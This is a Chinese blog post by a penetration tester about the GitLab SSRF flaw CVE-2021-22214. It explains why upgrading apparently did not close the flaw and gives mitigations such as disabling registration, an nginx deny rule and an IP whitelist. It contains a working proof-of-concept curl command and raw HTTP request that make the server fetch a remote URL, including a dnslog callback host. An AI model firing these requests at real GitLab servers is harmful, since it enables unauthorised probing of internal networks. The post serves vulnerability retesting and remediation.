生命在于研究——CVE-2021-22214记录

已于 2023-10-17 16:52:54 修改
阅读量355 收藏 1
点赞数
分类专栏: 生命在于研究 文章标签: 学习 安全 web安全
于 2023-09-28 16:04:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_15131581/article/details/133384705
版权

在这里插入图片描述

一、前言

我现在在某央企驻场,渗透测试工程师,也负责漏洞管理平台,也就是监测、渗透测试出现的漏洞,都会录入平台,走流程整改复测办结。

二、漏洞详情

1、漏洞简介

GitLab存在前台未授权SSRF漏洞,未授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。

2、漏洞POC

(1)命令行验证

curl -s --show-error -H 'Content-Type: application/json' https://example.com/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n  remote: http://xx.xxx.xx.xx:port/api/v1/targets?test.yml"}'

(2)burp发送包

POST /api/v4/ci/lint HTTP/1.1
Host: 192.168.8.230:36586
User-Agent: python-requests/2.25.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
Content-Length: 111

{"include_merged_yaml": true, "content": "include:\n  remote: http://4ggwkl.dnslog.cn/api/v1/targets?test.yml"}

这里可以使用dnslog测试是否有回显,也可以本机开启web服务,看是否有请求。

3、修复建议(贼坑)

看了好多地方,查阅了好多资料,只有短短几句话:

影响范围 : 
13.10.5 > GitLab >= 10.5
13.11.5 > GitLab >= 13.11
13.12.2 > GitLab >= 13.12
 当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。链接如下:
https://about.gitlab.com/releases/2021/06/01/security-release-gitlab-13-12-2-released/

三、寻找修复建议

我们这边整改报告说已经将gitlab升级到了15.11.12
在这里插入图片描述
然后我对这个漏洞进行复测,使用poc去验证,结果发现漏洞依旧存在:
在这里插入图片描述

DNSlog也有回显。在这里插入图片描述
这时候我就想起了Tomcat的漏洞:
CVE-2020-8022,当时朋友说已经升级了,但还是可以扫描到漏洞:
在这里插入图片描述
我看了一下这个漏洞:
在这里插入图片描述

朋友反馈:
在这里插入图片描述
所以这里我就找啊,找啊,目光放到了这个接口上。
查了好多地方,都只是单纯的说升级最新版本,只有在gitlab官方才有一个人提到后续高版本也存在该漏洞,但没有理会。
我直接拉了一个靶场,研究研究。

四、目前的解决方法

1、关闭注册功能

在官方文档中我看到以下信息:
在这里插入图片描述
也就是说,这个API是用来验证CI YAML配置的接口,如果开启注册功能,并且不存在允许和拒绝列表,不需要管理员批准才可以注册,没有其他注册限制,这个接口是不需要认证的,可以直接使用,然后使用include的remote远程包含来执行恶意命令。
但我使用的靶场是13.11版本,和官方说明有所不同,不管我有没有注册限制,只要开启了注册功能,这个接口便会存在该漏洞,关闭注册功能,会显示401未认证,亲测有效。

2、直接使该接口403

请做以下操作,进入容器,编辑/etc/gitlab/gitlab.rb文件,里面的设置默认都是注释掉的,找到以下字段或者增加以下字段:nginx[‘custom_gitlab_server_config’] = “location ^~ /api/v4/ci/lint {\n deny all;\n}\n”。然后在终端输入gitlab-ctl reconfigure,该接口便会被禁止访问,亲测有效。

3、直接白名单限制,这个在gitlab设置也可以,在waf设置也可以。

加白名单的具体操作如下:

  cd /etc/gitlab
  vim /gitlab.rb
加入以下字符:
gitlab_rails['rack_attack_git_basic_auth'] = {
   'enabled' => true,
   'ip_whitelist' => ["127.0.0.1","IP地址"],
   'maxretry' => 300,
   'findtime' => 5,
   'bantime' => 60
 }
  gitlab-ctl reconfigure保存,gitlab-ctl restart重启

五、后记

这个漏洞我并没有研究很透彻,但好歹可以积累一些知识,还是那句话,多看官方说明文档。

易水哲
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
Gitlab SSRF(CVE-2021-22214)
最新发布
m0_65150886的博客
02-02 276
当13.10.5 > GitLab >= 10.5、13.11.5 > GitLab >= 13.11、13.12.2 > GitLab >= 13.12时,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。而根据其说明文档文档,其include操作支持remote选项,用于获取远端的yaml。GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。
追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)
Ms08067安全实验室
06-22 6035
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web安全攻防合伙人) GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来...
(CVE-2021-22214)Gitlab SSRF漏洞 漏洞复现
鸣蜩十四的博客
08-09 2532
简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务。 漏洞描述 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档,其include 操作支持remote选项,用于获取远端的yaml。因此在此处将
CVE-2021-22214 Gitlab_SSRF
weixin_45945976的博客
12-15 2681
CVE-2021-22214 Gitlab_SSRF 漏洞复现: 目标地址:https://gitlab.xxx.xxx/users/sign_in POC curl -s --show-error -H 'Content-Type: application/json' https://gitlab.xxx.xxx/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://fbnw
[CVE-2021-22214]Gitlab SSRF 未授权访问漏洞
whoami
04-13 3325
一、影响版本 13.10.5 > GitLab >= 10.5 13.11.5 > GitLab >= 13.11 13.12.2 > GitLab >= 13.12 二、漏洞POC curl -s --show-error -H 'Content-Type: application/json' http://127.0.0.1:55001/api/v4/ci/lint --data '{ "include_merged_yaml": true, "con
gitlab SSRF(CVE-2021-22214)
YouthBelief的博客
11-11 1734
gitlab SSRF CVE-2021-22214gitlab SSRF(CVE-2021-22214)0x01 漏洞描述0x02 影响范围0x03 漏洞复现curl检测脚本检测0x04 漏洞修复 gitlab SSRF(CVE-2021-22214) 0x01 漏洞描述 GitLab存在前台未授权SSRF漏洞。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。 0x0
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
**Laravel 框架中的 CVE-2021-3129 漏洞详解及 EXP 利用** Laravel 是一个流行的开源 PHP Web 应用框架,以其优雅的语法和强大的功能深受开发者喜爱。然而,就像任何其他软件一样,Laravel 也存在安全漏洞。其中之...
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
新思科技《2022 年开源安全和风险分析》报告分析解读第三篇——许可证/开源维护部分
hhhhh109p的博客
05-24 795
目录 许可证 许可证冲突 无许可证或自定义许可证 各行业许可证合规情况 前十大有冲突的许可证(新增内容) 开源的维护 开源维护者的现状(新增内容) 总结 随着整个社会加速数字化、网络化、智能化,开源已经成为势不可挡的趋势,驱动云计算、大数据、人工智能等技术和产业的进步。而随着开源产业繁荣兴起,开源的安全问题也备受关注。 今年4月,新思科技发布了《2022年开源安全和风险分析》报告(OSSRA)。该报告由新思科技网络安全研究中心(CyRC)制作,共调查了17个行业的2400多个商业代码
Gitlab SSRF 漏洞复现 CVE-2021-22214
afei001
08-03 1169
GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。当对内部网络的webhook的请求被启用时,GitLab CE/EE中一个服务器端请求伪造漏洞SSRF(影响从10.5开始的所有版本)就有可能被未经身份验证的攻击者利用,即使是在注册受限的GitLab实例上。...
【Tomcat漏洞复现】CVE-2020-1938文件包含漏洞+Tomcat8+弱口令&&后台getshell漏洞+CVE_2017_12615远程代码执行漏洞
serendipity1130的博客
09-01 9734
CVE-2020-1938 Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等。 tomcat默认的conf/server.xml中配置了2个Connector,一个为8080的对外提供的HTTP协议端口,另外一个就是默认的8009 AJP协议端口,两个端口默认均监听在外网ip。 1.使用nmap对靶机进行扫描,查看8009端口是否处
Tomcat文件漏洞问题及处理方式
Doubletree.lin的博客
02-25 4870
学海无涯,旅“途”漫漫,“途”中小记,如有错误,敬请指出,在此拜谢! 一、前情提要 用了万年的tomcat,出现了bug。2月21日,据国家信息安全漏洞共享平台公开的漏洞公告中发现Apache Tomcat文件包含漏洞CNVD-2020-10487(对应CVE-2020-1938),Apache Tomcat服务器中被发现存在文件包含漏洞,攻击者利用该漏洞,可在未授权的情况下远程读取特定目录下...
Log4j2漏洞复现(CVE-2021-44228)
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
网安学习——信息收集
haoaaao的博客
02-12 2702
一、架构、搭建、waf
CVE-2021-22214
08-09
CVE-2021-22214是一个与GitLab相关的SSRF漏洞。该漏洞允许攻击者通过构造特定的请求,在GitLab中实现服务器端请求伪造。通过发送恶意的请求,攻击者可以执行未经授权的操作,可能导致敏感信息泄露或系统受到攻击。 该漏洞的影响范围包括受影响的GitLab版本。您提供的引用中包含了一些关于漏洞复现的POC(Proof of Concept)示例代码,用于验证漏洞存在性。这些示例代码展示了如何利用该漏洞进行攻击。 为了修复该漏洞,用户应及时更新受影响的GitLab版本到修复补丁发布的版本。此外,还可以采取其他安全措施,如限制对GitLab API的访问权限,以减少潜在的攻击风险。 请注意,漏洞利用和攻击是违法行为,请确保在合法授权和法律框架内进行任何安全研究和测试活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

易水哲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值